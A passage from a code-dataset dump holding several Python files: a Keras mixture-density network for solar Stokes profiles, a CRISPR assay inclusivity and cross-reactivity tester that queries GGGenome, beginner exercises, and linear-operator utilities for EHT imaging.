= tmp['sigmas']\n\n self.n_modes = len(self.sigmas)\n\n self.oneDivSqrtTwoPI = 1.0 / np.sqrt(2.0*np.pi) # normalisation factor for gaussian.\n\n def gaussian_distribution(self, y, mu, sigma):\n result = (y - mu) / sigma\n result = - 0.5 * (result * result)\n return (K.exp(result) / sigma) * self.oneDivSqrtTwoPI\n\n def gaussian_distribution_np(self, y, mu, sigma):\n result = (y - mu) / sigma\n result = - 0.5 * (result * result)\n return (np.exp(result) / sigma) * self.oneDivSqrtTwoPI\n \n def mdn_loss_function(self, args):\n y, weights = args\n result = self.gaussian_distribution(y, self.center_locs, self.sigmas) * weights\n result = K.sum(result, axis=1)\n result = - K.log(result)\n return K.mean(result)\n\n def read_data(self):\n print(\"Reading data...\")\n self.f = netcdf.netcdf_file('/net/viga/scratch1/deepLearning/DNHazel/database/database_mus_1000000.db', 'r')\n self.stokes = self.f.variables['stokes'][:]\n self.parameters = self.f.variables['parameters'][:]\n self.n_lambda = len(self.stokes[0,:,0])\n self.n_training = 1000 #int(self.fraction_training * len(self.stokes[0,0,:]))\n\n mu = self.parameters[7,:]\n thB = self.parameters[5,:] * np.pi / 180.0\n phiB = self.parameters[6,:] * np.pi / 180.0\n\n cosThB = mu * np.cos(thB) + np.sqrt(1.0-mu**2) * np.sin(thB) * np.cos(phiB)\n sinThB = np.sqrt(1.0 - cosThB**2)\n\n cosPhiB = (mu * np.sin(thB) * np.cos(phiB) - np.sqrt(1.0-mu**2) * np.cos(thB)) / sinThB\n sinPhiB = np.sin(thB) * np.sin(phiB) / sinThB\n\n ThB = np.arctan2(sinThB, cosThB) * 180.0 / np.pi\n PhiB = np.arctan2(sinPhiB, cosPhiB) * 180.0 / np.pi\n\n# Add training data, which include the Stokes parameters, the value of the output variable and mu\n self.train = []\n self.train.append(self.stokes[:,:,0:self.n_training].T.reshape((self.n_training, self.n_lambda, 4)).astype('float32'))\n if (self.var == 'tau'):\n var = self.parameters[0,0:self.n_training].reshape((self.n_training, 1)) / 2.0\n if (self.var == 'v'):\n var = self.parameters[1,0:self.n_training].reshape((self.n_training, 1)) / 5.0\n if (self.var == 'vth'):\n var = self.parameters[2,0:self.n_training].reshape((self.n_training, 1)) / 10.0\n if (self.var == 'a'):\n var = self.parameters[3,0:self.n_training].reshape((self.n_training, 1)) / 0.5\n if (self.var == 'B'):\n var = self.parameters[4,0:self.n_training].reshape((self.n_training, 1)) / 1000.0\n if (self.var == 'thB'):\n var = thB[0:self.n_training].reshape((self.n_training, 1)) / np.pi\n if (self.var == 'phiB'):\n var = phiB[0:self.n_training].reshape((self.n_training, 1)) / np.pi\n if (self.var == 'thB_LOS'):\n var = ThB[0:self.n_training].reshape((self.n_training, 1)) / np.pi\n if (self.var == 'phiN_LOS'):\n var = PhiB[0:self.n_training].reshape((self.n_training, 1)) / np.pi\n\n self.train.append(var.astype('float32'))\n self.train.append(self.parameters[-1,0:self.n_training].reshape((self.n_training, 1)).astype('float32'))\n\n def build_estimator(self):\n\n# Inputs\n input_x = Input(shape=(self.n_lambda,4), name='stokes_input')\n y_true = Input(shape=(1,), name='y_true')\n mu_input = Input(shape=(1,), name='mu_input')\n\n# Neural network\n x = Conv1D(64, 3, activation='relu', padding='same', kernel_initializer='he_normal', name='conv_1')(input_x)\n\n for i in range(3):\n x = residual(x, 64*(i+1), 'relu', strides=2)\n \n intermediate = Flatten(name='flat')(x)\n intermediate_conv = concatenate([intermediate, mu_input], name='FC')\n\n# Output weights\n weights = Dense(self.n_modes, activation='softmax', name='weights')(intermediate_conv)\n\n# Definition of the loss function\n loss = Lambda(self.mdn_loss_function, output_shape=(1,), name='loss')([y_true, weights])\n \n self.model = Model(inputs=[input_x, y_true, mu_input], outputs=[loss])\n #self.model.add_loss(loss)\n \n# Compile with the loss weight set to None, so it will be omitted\n #self.model.compile(loss=[None], loss_weights=[None], optimizer=Adam(lr=self.lr))\n self.model.load_weights(\"{0}_{1}_best.h5\".format(self.root, self.var))\n\n# Now generate a second network that ends up in the weights for later evaluation\n self.model_weights = Model(inputs=self.model.input,\n outputs=self.model.get_layer('weights').output)\n \n def forward_network(self):\n print(\"Reading network...\")\n self.build_estimator()\n\n y = np.linspace(0.0,2.0,300).reshape((300,1))\n \n weights = self.model_weights.predict(self.train)\n\n prob = np.zeros((self.n_training,300))\n\n for i in range(self.n_training):\n result = self.gaussian_distribution_np(y, self.center_locs, self.sigmas) * weights[i,:]\n prob[i,:] = np.sum(result, axis=-1)\n\n stop()\n\n def predict_density(self, x_test):\n y = np.linspace(-10,10,300).reshape((300,1))\n weights = self.model.predict(x_test)\n result = self.gaussian_distribution(torch.unsqueeze(y,1), self.center_locs, self.sigmas) * weights\n result = torch.sum(result, dim=1)\n return y.data.numpy(), result\n \nif (__name__ == '__main__'):\n\n\n parser = argparse.ArgumentParser(description='Predict for KMN')\n parser.add_argument('-o','--model', help='Output files', required=True)\n parser.add_argument('-b','--batch_size', help='Batch size', default=256)\n parser.add_argument('-v','--var', help='Variable to train', choices=['tau','v','vth','a','B','thB','phiB','thB_LOS','phiB_LOS'], \n default='tau', required=True)\n\n parsed = vars(parser.parse_args())\n\n out = kernel_mixture_network(parsed)\n out.read_data()\n \n out.forward_network()","repo_name":"aasensio/DeepLearning","sub_path":"DNHazel/testing/test_kmn.py","file_name":"test_kmn.py","file_ext":"py","file_size_in_byte":7574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70242627641","text":"import os\nimport gzip\nfrom argparse import ArgumentParser\nimport pandas as pd\nimport numpy as np\nimport requests\nfrom tqdm import tqdm\nimport subprocess\nimport io\nfrom math import floor\nfrom pathlib import Path\nfrom concurrent.futures import ThreadPoolExecutor\n\n\nclass FastaExtract(object):\n def __init__(self, args):\n args = args\n self.mafft_alignment = args.alignment\n self.sequence = args.sequence\n self.list = args.list\n self.cutoff = args.cutoff\n self.ref = args.reference\n self.gap = args.gap\n self.mismatch = args.mismatch\n self.list = args.list\n self.output_folder = args.output\n\n # Data\n self.sample_dict = dict()\n\n # Output files\n alignment_name = '.'.join(os.path.basename(self.mafft_alignment).split('.')[:-1])\n self.extracted = self.output_folder + alignment_name + '_extracted.txt'\n self.output_tsv = self.output_folder + '/ROI_stats.tsv'\n self.masked_output_tsv = self.output_folder + '/ROI_masked_stats.tsv'\n self.gggenome_raw_output_tsv = self.output_folder + '/GGGenome_matches.tsv'\n self.gggenome_summary_output_tsv = self.output_folder + '/GGGenome_summary.tsv'\n\n # Run\n self.run()\n\n def run(self):\n self.check() # Check if can find input alignment file\n\n # Samples\n if self.list:\n self.sample_dict = FastaExtract.parse_list(self.list)\n elif self.sequence:\n self.sample_dict = {'crRNA': self.sequence}\n\n alignment_name = '.'.join(os.path.basename(self.mafft_alignment).split('.')[:-1])\n\n # Loop all the input sequences\n for desc, sequence in self.sample_dict.items():\n print(sequence)\n # Output files\n extracted = self.output_folder + '/' + alignment_name + '_' + desc + '_extracted.txt'\n output_tsv = self.output_folder + '/ROI_stats' + '_' + desc + '.tsv'\n masked_output_tsv = self.output_folder + '/ROI_masked_stats' + '_' + desc + '.tsv'\n gggenome_raw_output_tsv = self.output_folder + '/GGGenome_matches' + '_' + desc + '.tsv'\n gggenome_summary_output_tsv = self.output_folder + '/GGGenome_summary' + '_' + desc + '.tsv'\n\n # Compute the maximum number of mismatch(es) automatically based on query length\n max_diff = int(floor(len(sequence) * self.mismatch))\n print('Performing cross-reactivity test with up to {} mismatch(es)'.format(max_diff))\n\n # GGGenome\n ggg_df, diff_dict = FastaExtract.loop_gggenome(sequence, max_diff, self.gap)\n\n # Write GGGenome df to CSV file\n FastaExtract.print_table(ggg_df, gggenome_raw_output_tsv)\n\n # Create GGGenome summary dataframe\n sum_df = FastaExtract.create_gggenome_summary(diff_dict, max_diff)\n\n # Write GGGenome summary to file from dataframe\n FastaExtract.print_table(sum_df, gggenome_summary_output_tsv)\n\n # Extract start and end positions from the reference Wuhan sequences to perform the inclusivity analysis\n start, end = FastaExtract.get_start_end_positions(ggg_df)\n\n ##### Inclusivity test #####\n\n print('\\nPerforming inclusivity test')\n\n roi_ref = FastaExtract.extract_ref(self.ref, start, end)\n print('\\tReference ROI: {} ({}..{})'.format(roi_ref, start, end))\n\n # Parse alignment file to extract counts for each variant of the region of interest\n print('\\tParsing MAFFT alignment file and extracting ROI for each entry')\n FastaExtract.extract(self.mafft_alignment, extracted, start, end) # comment for debug\n roi_dict = FastaExtract.filter_n(extracted)\n\n # Output the variant frequency table\n print('\\tFiltering ROI and preparing report file')\n # Replace conserved bases with dots\n df = FastaExtract.filter_cutoff(roi_dict, self.cutoff, roi_ref)\n FastaExtract.print_table(df, output_tsv) # Print table\n\n # Mask sequences\n FastaExtract.mask_alignment(df)\n FastaExtract.print_table(df, masked_output_tsv)\n\n print('\\nDone!')\n\n def check(self):\n # Replace \"tild\" with home folder path\n if '~' in self.mafft_alignment:\n self.mafft_alignment = os.path.expanduser(self.mafft_alignment)\n # Check if path to MAFFT file is correct\n if not os.path.isfile(self.mafft_alignment):\n raise Exception('Could not locate alignment file. Please use absolute path to file.')\n # Check if mismatches/gaps is 25% or less. Otherwise GGGenome will return an error.\n if self.mismatch > 0.25:\n raise Exception('Number of mismatches/gaps should be 25% (0.25) or less.')\n # Check if using a single sequence (-l) or a sequence list file\n if self.sequence and self.list:\n raise Exception('Cannot use \"-s\" and \"-list\" options simultaneously.')\n if not self.sequence and not self.list:\n raise Exception('Please use \"-s\" or \"-l\".')\n # Check if sequence list file exists\n if self.list:\n if not os.path.isfile(self.list):\n raise Exception('Could not locate list file. Please use absolute path to file.')\n # Check for illegal characters in sequences\n if self.list:\n if not all(FastaExtract.check_sequence(seq) for desc, seq in self.sample_dict.items()):\n raise Exception('Query sequence contains illegal bases. Only \"ATUCGN\" are accepted.')\n elif self.sequence:\n if not FastaExtract.check_sequence(self.sequence):\n raise Exception('Query sequence contains illegal bases. Only \"ATUCGN\" are accepted.')\n # Create output folder, in case it doesn't exists\n FastaExtract.make_folder(self.output_folder)\n\n @staticmethod\n def make_folder(folder):\n # Will create parent directories if don't exist and will not return error if already exists\n Path(folder).mkdir(parents=True, exist_ok=True)\n\n @staticmethod\n def check_sequence(seq):\n return all(nuc in ['A', 'T', 'C', 'G', 'U', 'N'] for nuc in seq)\n\n @staticmethod\n def parse_list(list_file):\n sample_dict = dict()\n with open(list_file, 'r') as f:\n for line in f:\n line = line.rstrip()\n desc = line.split('\\t')[0].replace(' ', '_') # Replace space by underscore\n seq = line.split('\\t')[1]\n sample_dict[desc] = seq\n return sample_dict\n\n @staticmethod\n def block_read(my_file, size=1048576):\n while True:\n b = my_file.read(size)\n if not b:\n break\n yield b\n\n @staticmethod\n def count_lines(my_file):\n total_cnt = 0 # Total entries in fasta file\n with gzip.open(my_file, 'rb', 1024*1024) if my_file.endswith('gz') \\\n else open(my_file, 'r', 1024*1024) as in_f:\n if my_file.endswith('gz'):\n total_cnt = sum(bl.count(b'\\n') for bl in FastaExtract.block_read(in_f))\n else:\n total_cnt = sum(bl.count('\\n') for bl in FastaExtract.block_read(in_f))\n return total_cnt\n\n @staticmethod\n def extract(input_alignment, extracted, start, end):\n\n start_index = start - 1\n end_index = end\n\n with open(extracted, 'w') as out_f:\n with gzip.open(input_alignment, 'rb', 1024*1024) if input_alignment.endswith('gz') \\\n else open(input_alignment, 'r', 1024*1024) as in_f:\n seq_list = list()\n for line in tqdm(in_f, total=FastaExtract.count_lines(input_alignment)):\n line = line.rstrip()\n if input_alignment.endswith('gz'):\n line = line.decode() # Convert from binary to string\n if not line: # If line is empty\n continue # Skip to next line\n\n if line.startswith('>') and not seq_list: # First line\n continue # Skip to next line\n elif line.startswith('>') and seq_list: # A new sequence starts\n seq = ''.join(seq_list) # Combine all lines if sequence spanned over multiple lines\n extracted_seq = seq[start_index:end_index].upper() # Extract region of interest by slicing\n out_f.write('{}\\n'.format(extracted_seq))\n seq_list = list() # Empty list that collects the\n else: # Sequence line\n seq_list.append(line) # Fetch sequences spanning over multiple lines\n # For the last entry in the file\n seq = ''.join(seq_list)\n extracted_seq = seq[start_index:end_index].upper()\n out_f.write('{}\\n'.format(extracted_seq))\n\n @staticmethod\n def filter_n(extracted_roi):\n seq_dict = dict()\n\n with open(extracted_roi, 'r', 1024*1024) as in_f:\n for line in in_f:\n line = line.rstrip()\n if not line: # If line is empty\n continue # Skip to next line\n if any([x in line for x in ['N', 'n']]): # Skip extracted sequences with Ns\n continue\n\n # Add to dictionary\n if line in seq_dict:\n seq_dict[line] += 1 # Increase count by 1\n else:\n seq_dict[line] = 1 # Set count to 1\n\n return seq_dict\n\n @staticmethod\n def extract_ref(ref, start, end):\n with gzip.open(ref, 'rb', 1024*1024) if ref.endswith('gz') \\\n else open(ref, 'r', 1024*1024) as in_f:\n seq_list = list()\n for line in in_f:\n line = line.rstrip()\n if not line:\n continue\n if line.startswith('>'):\n continue\n else:\n seq_list.append(line)\n extracted_ref = ''.join(seq_list)[start - 1: end]\n return extracted_ref\n\n @staticmethod\n def filter_cutoff(seq_dict, cutoff, roi_ref):\n # Convert dictionary to Pandas dataframe\n df = pd.DataFrame.from_dict(seq_dict, orient='index')\n\n # Add column at the end for frequencies\n total = df[0].sum() # Sum all the counts\n freq_list = [float('{:.2f}'.format(x/total*100)) for x in df[0]]\n df['Frequency (%)'] = freq_list\n\n # Compute the added % of the lines to remove (below the cutoff)\n df_rem = df[df['Frequency (%)'] < cutoff * 100]\n cnt_rem = df_rem[0].sum()\n freq_rem = float('{:.2f}'.format(cnt_rem/total*100))\n\n # Remove lines with frequency below cutoff\n df = df[df['Frequency (%)'] >= cutoff * 100]\n\n # Sort descending based on index values\n df.sort_values(by=0, ascending=False, inplace=True)\n\n # Add a new index column\n df.reset_index(inplace=True)\n\n # Change index values\n df.index = np.arange(1, len(df[0]) + 1)\n\n # Rename \"index\" column\n df = df.rename(columns={'index': 'Variant'})\n\n # Rename columns\n df.columns = ['Variant', 'Count', 'Frequency (%)']\n\n # Add name to index column\n df.index.rename('Group', inplace=True)\n\n # Move columns\n df = df[['Count', 'Frequency (%)', 'Variant']]\n\n # Insert reference sequence at first line\n new_row = pd.DataFrame({'Count': '', 'Frequency (%)': '', 'Variant': roi_ref}, index=['Wuhan-Hu-1'])\n df = pd.concat([new_row, df])\n\n # Add a row at the end named \"Removed\" with the added % of the removed lines so the added freq.=100%\n rem_row = pd.DataFrame({'Count': cnt_rem, 'Frequency (%)': freq_rem, 'Variant': ''},\n index=['Variants with frequency lower than {}%'.format(cutoff * 100)])\n df = pd.concat([df, rem_row])\n\n return df\n\n @staticmethod\n def mask_alignment(df):\n # Get ref sequence\n ref = df.loc['Wuhan-Hu-1', 'Variant']\n # compare to wild type\n for i, row in df.iterrows():\n if i == 'Wuhan-Hu-1': # Don't change the reference sequence\n continue\n seq = df.loc[i, 'Variant']\n seq_list = list()\n for j, b in enumerate(seq):\n if b == ref[j]:\n seq_list.append('.')\n else:\n seq_list.append(b)\n masked_seq = ''.join(seq_list)\n\n # Replace variant sequence in dataframe with masked one\n df.loc[i, 'Variant'] = masked_seq\n\n return df\n\n @staticmethod\n def print_table(df, output_tsv):\n with open(output_tsv, 'w') as out_f:\n df.to_csv(out_f, sep='\\t', header=True, index=True)\n\n @staticmethod\n def run_mafft(input_fasta, reference_fasta, mafft_cutoff):\n output_alignment = '.'.join(input_fasta.split('.')[:-1]) + '_mafft' + mafft_cutoff + '.fasta'\n cmd = ['mafft', '--auto', '--keeplength',\n '--maxambiguous', str(mafft_cutoff),\n '--addfragments', input_fasta, reference_fasta]\n with open(output_alignment, 'w') as f:\n subprocess.Popen(cmd, stdout=f) # write standard output (alignment) to file\n\n @staticmethod\n def run_gggenome_online(seq, db, mismatch, gap=False):\n \"\"\"\n http://gggenome.dbcls.jp/help.html\n\n http[s]://GGGenome.dbcls.jp/db/k/[strand]/[nogap]/sequence[.format][.download]\n db: hg19, mm10, dm3, ce10, TAIR10, pombe, refseq, etc. (default: hg19)\n Full list of databases is available below.\n k: Maximum number of mismatches/gaps. (default: 0)\n strand: '+' ('plus') or '-' ('minus') to search specified strand only. (optional)\n nogap: No gaps. Allow only k mismatches. (optional)\n sequence: Nucleotide sequence, case insensitive.\n format: html, txt, csv, bed, gff, json. (default: html)\n download: Download result as a file. (optional)\n \"\"\"\n # http://gggenome.dbcls.jp/COVID19-primercheck-EUA-20200501/5/TTTGCCCCCAGCGCTTCAGCGTT\n # http://gggenome.dbcls.jp/hg38/4/nogap/TTTGCCCCCAGCGCTTCAGCGTT\n url = 'https://GGGenome.dbcls.jp/{}/{}/nogap/{}.csv.download'.format(db, mismatch, seq)\n if gap:\n url = 'https://GGGenome.dbcls.jp/{}/{}/{}.csv.download'.format(db, mismatch, seq)\n r = requests.get(url, stream=True)\n if r.status_code != 200:\n r.raise_for_status()\n # raise Exception('Problem with GGGenome URL request: {}'.format(r.status_code))\n else:\n # Parse results into Pandas dataframe using \"fake\" file handle with SingIO\n try:\n df = pd.read_csv(io.StringIO(r.content.decode()), sep=',', skiprows=6)\n return df\n except Exception as e:\n print(type(e).__name__, e)\n\n @staticmethod\n def loop_gggenome(roi_ref, max_diff, gap):\n # Loop dataframe and check sequence with GGGenome\n # Results are returned in a new dataframe\n\n # Master GGGenome dataframe\n ggg_df = pd.DataFrame(columns=['# name', 'strand', 'start', 'end', 'snippet', 'snippet_pos', 'snippet_end',\n 'query', 'sbjct', 'align', 'edit', 'match', 'mis', 'del', 'ins'])\n\n # Reformat GGGenome output table\n # Loop through GGGenome results for each query with increasing differences allowed\n # TODO: check for hits in human genome too.\n db_list = ['COVID19-primercheck-EUA-20200501', 'hg38']\n for db in db_list:\n print('\\tTesting query online with GGGenome using \"{}\" database'.format(db))\n for diff in range(0, max_diff+1):\n df1 = FastaExtract.run_gggenome_online(roi_ref, db, diff, gap)\n # Check if results returned\n if df1.empty or df1['# name'][0] == '### No items found. ###':\n continue\n else:\n ggg_df = pd.concat([ggg_df, df1])\n\n # Remove duplicated entries\n ggg_df = ggg_df.drop_duplicates()\n\n # Reset index. Some rows have to same index.\n ggg_df.reset_index(drop=True, inplace=True)\n\n # Remove matches to unplaced contigs in human genome\n search_list = ['_alt', '_random']\n to_drop_list = ggg_df.index[ggg_df['# name'].str.contains('|'.join(search_list))].tolist()\n ggg_df.drop(to_drop_list, inplace=True)\n ggg_df.reset_index(drop=True, inplace=True) # Reset pandas index\n\n # Add results to summary dataframe\n name_list = ggg_df['# name'].to_list() # convert name column to list\n org_list = [FastaExtract.extract_org(x) for x in name_list]\n\n # remove duplicates from list\n org_list = list(dict.fromkeys(org_list))\n diff_dict = dict()\n\n for org in org_list:\n if org not in diff_dict.keys():\n diff_dict[org] = dict()\n # Generate headers for differences (mismatches and gaps)\n for diff in range(0, max_diff+1):\n diff_dict[org][diff] = 0\n\n # Fetch the difference values\n if org.startswith('chr'):\n matching_row_list = ggg_df.index[ggg_df['# name'] == org].tolist()\n else:\n matching_row_list = ggg_df.index[ggg_df['# name'].str.contains(org)].tolist()\n for j in matching_row_list:\n mismatches = len(roi_ref) - ggg_df.iloc[j]['match']\n diff_dict[org][mismatches] += 1 # Add 1 to the count\n\n return ggg_df, diff_dict\n\n @staticmethod\n def create_gggenome_summary(diff_dict, max_diff):\n # Generate headers for differences (mismatches and gaps)\n header_list = list()\n for diff in range(0, max_diff+1):\n header_list.append(str(diff))\n\n # Convert dictionary to pandas dataframe\n df = pd.DataFrame.from_dict(diff_dict, orient='index')\n\n # Rename index column\n df = df.rename_axis(\"Organism\")\n # df.index.rename(['Organism'], inplace=True)\n\n # Prepare name for columns\n header_list = ['m' + str(x) for x in header_list]\n\n # Rename columns\n df.columns = header_list\n\n # Add a column at the end with the total mismatches per organism\n df['Total'] = df.sum(axis=1)\n\n # Sort rows by 1) total number of mismatches and 2) alphabetically\n df.sort_values(by=header_list, ascending=[False] * len(header_list), inplace=True)\n # df.sort_index(ascending=True, inplace=True) # Sort alphabetically\n\n # Add a row at the end with total for each mismatch column\n df.loc['Total'] = df.sum(numeric_only=True, axis=0)\n\n return df\n\n @staticmethod\n def reverse_complement(seq):\n rc_tab = str.maketrans('ATCG', 'TAGC')\n return seq.translate(rc_tab)[::-1]\n\n @staticmethod\n def extract_org(header):\n # regex = re.compile(r\"\\s*ctg\\s*\", flags=re.IGNORECASE)\n org = header.split(' ')\n if len(org) > 1:\n org = header.split(' ', 1)[1] # Ditch the accession number\n org = org.split(',')[0]\n org = org.split('chromosome')[0]\n org = org.split('NODE')[0]\n org_list = org.split() # split string into list\n for i, word in enumerate(org_list):\n if any([substring in word for substring in ['ctg', 'scaf', 'scf']]):\n del org_list[i]\n org = ' '.join(org_list)\n org = org.split('contig')[0]\n return org\n else: # hit in human genome (eg. chr2)\n return header\n\n @staticmethod\n def extract_acc(header):\n return header.split(' ')[0]\n\n @staticmethod\n def get_start_end_positions(df):\n return df.loc[0, 'start'], df.loc[0, 'end']\n\n\nif __name__ == '__main__':\n parser = ArgumentParser(description='Extract region from fasta file.')\n parser.add_argument('-a', '--alignment', metavar='mafft_alignment.fasta',\n required=True,\n type=str,\n help='Mafft alignment file.'\n ' Mandatory.')\n parser.add_argument('-s', '--sequence', metavar='TTTNCCCCCAGCGCTTCAGCGTTC',\n required=False,\n type=str,\n help='Sequence to test (PAM+crRNA).'\n ' Must use \"-s\" or \"-l\".')\n parser.add_argument('-l', '--list', metavar='sequence_list.tsv',\n required=False,\n type=str,\n help='A 2-column tab-separated file: Description<tab>Sequence.'\n ' Must use \"-s\" or \"-l\".')\n parser.add_argument('-c', '--cutoff', metavar='0.001',\n type=float, default=0.001,\n required=False,\n help='Cutoff frequency to keep a variant. Must be between 0 and 1.'\n ' Default is 0.001.')\n parser.add_argument('-r', '--reference', metavar='reference.fasta',\n required=True,\n type=str,\n help='Reference fasta file.'\n ' Mandatory.')\n parser.add_argument('-o', '--output', metavar='/output/folder',\n required=True,\n type=str,\n help='Output folder path.')\n parser.add_argument('-g', '--gap',\n action='store_true',\n help='Allows gaps in GGGenome search. Default is False.')\n parser.add_argument('-m', '--mismatch', metavar='0.20',\n type=float,\n required=False,\n default=0.20,\n help='Percentage of mismatch allowed.'\n ' Minimum is 0 and maximum is 0.25 (GGGenome requirement).'\n ' Includes gaps if \"-g\" is used.'\n ' Default is 0.20.')\n\n # Get the arguments into an object\n arguments = parser.parse_args()\n\n FastaExtract(arguments)\n","repo_name":"duceppemo/CRISPR_Assay_Tester","sub_path":"crispr_tester.py","file_name":"crispr_tester.py","file_ext":"py","file_size_in_byte":22429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42943709766","text":"\ndef calculate(min, max, step):\n sum=0\n for n in range (min,max+1,step):\n sum=sum+n\n n+step\n print(sum)\n \ncalculate(1, 3, 1)\ncalculate(4,8,2)\ncalculate(-1,2,2) \n\ndef avg(data):\n from collections import Counter\n employees = [{\n \"name\":\"John\", \"salary\":30000, \"manager\":False\n }, \n {\n \"name\":\"Bob\", \"salary\":60000, \"manager\":True\n }, \n { \n \"name\":\"Jenny\", \"salary\":50000, \"manager\":False\n }, \n { \n \"name\":\"Tony\", \"salary\":40000, \"manager\":False\n } ]\n count_manager = lambda x:0 if x['manager'] else 1\n manager_list = map(count_manager, employees)\n ppl=(sum(manager_list))\n \n for entry in employees:\n count_salary = lambda x:0 if x['manager'] else entry[\"salary\"]\n salary_list = map (count_salary, employees)\n total=(sum(salary_list)) \n print(total/ppl)\n \n\n \navg({\n\"employees\":[ \n{\n\"name\":\"John\", \"salary\":30000, \"manager\":False\n}, \n{\n\"name\":\"Bob\", \"salary\":60000, \"manager\":True\n}, \n{ \n\"name\":\"Jenny\", \"salary\":50000, \"manager\":False\n}, \n{ \n\"name\":\"Tony\", \"salary\":40000, \"manager\":False\n} \n]\n})\n\ndef func(a):\n def func2(b,c):\n x=a+(b*c)\n print(x)\n return func2\n \n\n\nfunc(2)(3, 4)\nfunc(5)(1, -5)\nfunc(-3)(2, 9)\n\nimport sys\ndef maxProduct(nums):\n if len(nums) < 2:\n return\n max_product = -sys.maxsize\n max_i = max_j = -1\n for i in range(len(nums)-1):\n for j in range(i+1, len(nums)):\n if max_product < nums[i] * nums[j]:\n max_product = nums[i] * nums[j]\n (max_i, max_j) = (i,j)\n print(nums[max_i]* nums[max_j])\n\nmaxProduct([5, 20, 2, 6]) \nmaxProduct([10, -20, 0, 3]) \nmaxProduct([10, -20, 0, -3])\nmaxProduct([-1, 2])\nmaxProduct([-1, 0, 2]) \nmaxProduct([5,-1, -2, 0]) \nmaxProduct([-5, -2])\n \ndef twoSum(nums, target):\n for i in range(len(nums)):\n for j in range(i+1, len(nums)):\n s=nums[i]+nums[j]\n if s==target:\n return[i,j] \n\nresult=twoSum([2, 11, 7, 15], 9)\nprint(result) \n\n","repo_name":"Reneeeeeeeeeeee/week2","sub_path":"week2.py","file_name":"week2.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71962282999","text":"\"\"\"\nLinearOperators [1,2] objects and containers used for optimization [3].\nOperators should implement the methods: `_matvec(self, x)` and `_rmatvec(self, x)`. See [1] for more information.\n\nNotes\n-----\nTo check the validity of an adjoint implementation with respect to the forward use: `pynoisy.operators.dottest`\n\nReferences\n----------\n[1] https://docs.scipy.org/doc/scipy/reference/generated/scipy.sparse.linalg.LinearOperator.html\n[2] https://pylops.readthedocs.io/en/latest/\n[3] https://docs.scipy.org/doc/scipy/reference/generated/scipy.optimize.minimize.html\n\"\"\"\nimport numpy as _np\nimport xarray as _xr\nfrom scipy.sparse.linalg import LinearOperator as _LinearOperator\n\ndef dottest(Op, tol=1e-6, complexflag=0, raiseerror=True, verb=False):\n \"\"\"Dot test.\n Generate random vectors :math:`\\mathbf{u}` and :math:`\\mathbf{v}` and perform dot-test to verify the validity of\n forward and adjoint operators. This test can help to detect errors in the operator implementation.\n This function was taken from PyLops [1].\n\n Parameters\n ----------\n Op : :obj:`pylops.LinearOperator`\n Linear operator to test.\n tol : :obj:`float`, optional\n Dottest tolerance\n complexflag : :obj:`bool`, optional\n generate random vectors with real (0) or complex numbers\n (1: only model, 2: only data, 3:both)\n raiseerror : :obj:`bool`, optional\n Raise error or simply return ``False`` when dottest fails\n verb : :obj:`bool`, optional\n Verbosity\n\n Raises\n ------\n ValueError\n If dot-test is not verified within chosen tolerance.\n\n Notes\n -----\n A dot-test is mathematical tool used in the development of numerical\n linear operators.\n More specifically, a correct implementation of forward and adjoint for\n a linear operator should verify the following *equality*\n within a numerical tolerance:\n .. math::\n (\\mathbf{Op}*\\mathbf{u})^H*\\mathbf{v} =\n \\mathbf{u}^H*(\\mathbf{Op}^H*\\mathbf{v})\n\n References\n ----------\n [1] https://github.com/PyLops/pylops/blob/master/pylops/utils/dottest.py\n \"\"\"\n nr, nc = Op.shape\n\n if complexflag in (0, 2):\n u = _np.random.randn(nc)\n else:\n u = _np.random.randn(nc) + 1j*_np.random.randn(nc)\n\n if complexflag in (0, 1):\n v = _np.random.randn(nr)\n else:\n v = _np.random.randn(nr) + 1j*_np.random.randn(nr)\n\n y = Op.matvec(u) # Op * u\n x = Op.rmatvec(v) # Op'* v\n\n if complexflag == 0:\n yy = _np.dot(y, v) # (Op * u)' * v\n xx = _np.dot(u, x) # u' * (Op' * v)\n else:\n yy = _np.vdot(y, v) # (Op * u)' * v\n xx = _np.vdot(u, x) # u' * (Op' * v)\n\n # evaluate if dot test is passed\n if complexflag == 0:\n if _np.abs((yy - xx) / ((yy + xx + 1e-15) / 2)) < tol:\n if verb: print('Dot test passed, v^T(Opu)=%f - u^T(Op^Tv)=%f'\n % (yy, xx))\n return True\n else:\n if raiseerror:\n raise ValueError('Dot test failed, v^T(Opu)=%f - u^T(Op^Tv)=%f'\n % (yy, xx))\n if verb: print('Dot test failed, v^T(Opu)=%f - u^T(Op^Tv)=%f'\n % (yy, xx))\n return False\n else:\n checkreal = _np.abs((_np.real(yy) - _np.real(xx)) /\n ((_np.real(yy) + _np.real(xx)+1e-15) / 2)) < tol\n checkimag = _np.abs((_np.real(yy) - _np.real(xx)) /\n ((_np.real(yy) + _np.real(xx)+1e-15) / 2)) < tol\n if checkreal and checkimag:\n if verb:\n print('Dot test passed, v^T(Opu)=%f%+fi - u^T(Op^Tv)=%f%+fi'\n % (yy.real, yy.imag, xx.real, xx.imag))\n return True\n else:\n if raiseerror:\n raise ValueError('Dot test failed, v^H(Opu)=%f%+fi '\n '- u^H(Op^Hv)=%f%+fi'\n % (yy.real, yy.imag, xx.real, xx.imag))\n if verb:\n print('Dot test failed, v^H(Opu)=%f%+fi - u^H(Op^Hv)=%f%+fi'\n % (yy.real, yy.imag, xx.real, xx.imag))\n return False\n\nclass ModulateOp(_LinearOperator):\n \"\"\"\n Envelope modulation Operator in the form of scipy.sparse.linalg.LinearOperator object..\n output = modulation * envelope\n Parameters\n ----------\n modulation: xr.DataArray\n Modulation DaraArray with dimensions: ['t', 'y', 'x'].\n dtype: datatype, default=np.float64\n \"\"\"\n def __init__(self, modulation, dtype=_np.float64):\n self.modulation = modulation.data.reshape(modulation['t'].size, -1)\n\n # Shape and datatype\n nt, ny, nx = modulation['t'].size, modulation['y'].size, modulation['x'].size\n self._nt = nt\n self.shape = (nt * ny * nx, ny * nx)\n self.dtype = dtype\n\n def _matvec(self, x):\n output = (self.modulation * x).ravel()\n return output\n\n def _rmatvec(self, x):\n return _np.sum(_np.split(self.modulation.ravel() * x, self._nt), axis=0)\n\nclass ObserveOp(_LinearOperator):\n \"\"\"\n An EHT observation operator in the form of 